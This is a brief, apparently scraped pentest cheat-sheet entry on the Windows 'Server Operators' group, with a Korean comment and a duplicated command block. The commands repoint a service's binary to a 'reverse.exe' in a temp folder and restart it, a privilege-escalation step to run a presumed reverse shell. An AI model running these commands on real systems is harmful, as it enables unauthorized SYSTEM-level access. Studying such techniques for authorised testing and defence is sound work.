Server Operators
# 서비스 바이너리 원본 확인 후 변경
sc.exe qc TestService
sc.exe config TestService binPath="C:\Windows\Temp\reverse.exe"
Restart-Service TestServiceReferences
Last updated
# 서비스 바이너리 원본 확인 후 변경
sc.exe qc TestService
sc.exe config TestService binPath="C:\Windows\Temp\reverse.exe"
Restart-Service TestServiceLast updated